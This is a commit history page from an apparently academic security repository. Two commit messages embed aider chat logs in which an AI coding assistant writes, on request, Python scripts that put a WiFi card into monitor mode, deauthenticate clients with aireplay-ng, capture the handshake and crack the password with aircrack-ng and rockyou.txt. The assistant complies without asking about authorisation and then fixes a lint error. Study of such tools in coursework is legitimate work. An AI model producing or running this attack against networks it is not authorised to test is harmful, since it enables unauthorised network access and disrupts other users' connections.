david/gensec-westgate-djw2
Archived
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
81 Commits 1 Branch 0 Tags 1,004 KiB
main
Commit Graph

4 Commits

Author SHA1 Message Date
David Westgate
39f260f5b8 aider: Added Python implementation for WiFi penetration testing application. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application may utilize a wordlist found at ~/rockyou.txt

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Here is the implementation for the requested Python application to assist in WiFi penetration testing:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
=======
import subprocess
import threading
import time

def run_command(command):
    """Run a shell command with sudo and return the output."""
    result = subprocess.run(['sudo'] + command, capture_output=True, text=True)
    return result.stdout

def change_to_monitor_mode(interface):
    """Change the WiFi interface to monitor mode."""
    run_command(['airmon-ng', 'start', interface])

def change_to_managed_mode(interface):
    """Change the WiFi interface back to managed mode."""
    run_command(['airmon-ng', 'stop', interface])
    run_command(['service', 'network-manager', 'start'])

def get_wifi_interfaces():
    """Get a list of WiFi interfaces."""
    result = run_command(['iwconfig'])
    interfaces = []
    for line in result.split('\n'):
        if 'IEEE 802.11' in line:
            interfaces.append(line.split()[0])
    return interfaces

def get_target_network(interface):
    """Prompt the user for the target network SSID."""
    ssid = input("Enter the SSID of the target network: ")
    return ssid

def capture_handshake(target_network, interface):
    """Capture the handshake of the target network."""
    run_command(['airodump-ng', '--bssid', target_network, '-w', 'capture', interface])

def deauthenticate_clients(target_network, interface):
    """Deauthenticate clients to capture handshake."""
    run_command(['aireplay-ng', '--deauth', '0', '-a', target_network, interface])

def crack_password(capture_file, wordlist):
    """Crack the password using aircrack-ng and a wordlist."""
    result = run_command(['aircrack-ng', '-w', wordlist, capture_file])
    for line in result.split('\n'):
        if 'KEY FOUND!' in line:
            return line.split()[-1]
    return None

def main():
    interfaces = get_wifi_interfaces()
    if not interfaces:
        print("No WiFi interfaces found.")
        return

    interface = interfaces[0]
    change_to_monitor_mode(interface)

    target_network = get_target_network(interface)

    capture_thread = threading.Thread(target=capture_handshake, args=(target_network, interface))
    deauth_thread = threading.Thread(target=deauthenticate_clients, args=(target_network, interface))

    capture_thread.start()
    time.sleep(5)  # Give some time for airodump-ng to start
    deauth_thread.start()

    capture_thread.join()
    deauth_thread.join()

    change_to_managed_mode(interface)

    password = crack_password('capture-01.cap', '~/rockyou.txt')
    if password:
        print(f"The password for {target_network} is: {password}")
    else:
        print("Failed to crack the password.")

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```
 2024-05-30 14:43:40 -07:00
David Westgate
98312c9418 reset apps 2024-05-30 14:36:40 -07:00
David Westgate
6767b5f55d aider: Fixed crack_password function to include the 'bssid' parameter for password cracking. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Please add the file `hw7/gpt4/app.py` to the chat so I can proceed with the implementation.

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Here is the implementation for the requested Python application:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
=======
import os
import subprocess
import threading

def run_command(command):
    """Run a shell command with sudo and return the output."""
    result = subprocess.run(['sudo'] + command, capture_output=True, text=True)
    return result.stdout

def change_mode(interface, mode):
    """Change the mode of the wifi interface."""
    run_command(['ifconfig', interface, 'down'])
    run_command(['iwconfig', interface, 'mode', mode])
    run_command(['ifconfig', interface, 'up'])

def start_monitor_mode(interface):
    """Start monitor mode on the specified interface."""
    run_command(['airmon-ng', 'start', interface])

def stop_monitor_mode(interface):
    """Stop monitor mode on the specified interface."""
    run_command(['airmon-ng', 'stop', interface])

def capture_handshake(interface, bssid, channel):
    """Capture the handshake for the specified BSSID."""
    run_command(['airodump-ng', '--bssid', bssid, '--channel', channel, '-w', 'capture', interface])

def deauthenticate(interface, bssid, client):
    """Deauthenticate a client to capture the handshake."""
    run_command(['aireplay-ng', '--deauth', '0', '-a', bssid, '-c', client, interface])

def crack_password(cap_file, wordlist):
    """Crack the password using aircrack-ng."""
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
    return result

def main():
    interface = input("Enter the name of your wifi interface: ")
    bssid = input("Enter the BSSID of the target network: ")
    channel = input("Enter the channel of the target network: ")
    wordlist = input("Enter the path to your wordlist: ")

    # Change to monitor mode
    change_mode(interface, 'monitor')
    start_monitor_mode(interface)

    # Capture handshake
    capture_thread = threading.Thread(target=capture_handshake, args=(interface, bssid, channel))
    capture_thread.start()

    # Deauthenticate clients
    deauth_thread = threading.Thread(target=deauthenticate, args=(interface, bssid, 'FF:FF:FF:FF:FF:FF'))
    deauth_thread.start()

    capture_thread.join()
    deauth_thread.join()

    # Crack password
    password = crack_password('capture-01.cap', wordlist)
    print(f"The password is: {password}")

    # Change back to managed mode
    stop_monitor_mode(interface)
    change_mode(interface, 'managed')

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```

USER:
# Fix any errors below, if possible.

## Running: flake8 --select=E9,F821,F823,F831,F406,F407,F701,F702,F704,F706 --show-source hw7/gpt4/app.py

hw7/gpt4/app.py:34:64: F821 undefined name 'bssid'
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
                                                               ^

## See relevant line below marked with █.

/home/kali/Documents/djw2/gensec/gensec-westgate-djw2/hw7/gpt4/app.py:
...⋮...
 31│
 32│def crack_password(cap_file, wordlist):
 33│    """Crack the password using aircrack-ng."""
 34█    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
 35│    return result
 36│
 37│def main():
...⋮...

ASSISTANT: To fix the error, we need to pass the `bssid` parameter to the `crack_password` function. Here are the necessary changes:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
def crack_password(cap_file, wordlist):
=======
def crack_password(cap_file, wordlist, bssid):
>>>>>>> REPLACE
```

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
    password = crack_password('capture-01.cap', wordlist)
=======
    password = crack_password('capture-01.cap', wordlist, bssid)
>>>>>>> REPLACE
```
 2024-05-30 13:59:52 -07:00
David Westgate
7dde8a9e64 Added functions to change wifi interface mode, start/stop monitor mode, capture handshake, deauthenticate clients, and crack password using aircrack-ng. 2024-05-30 13:59:52 -07:00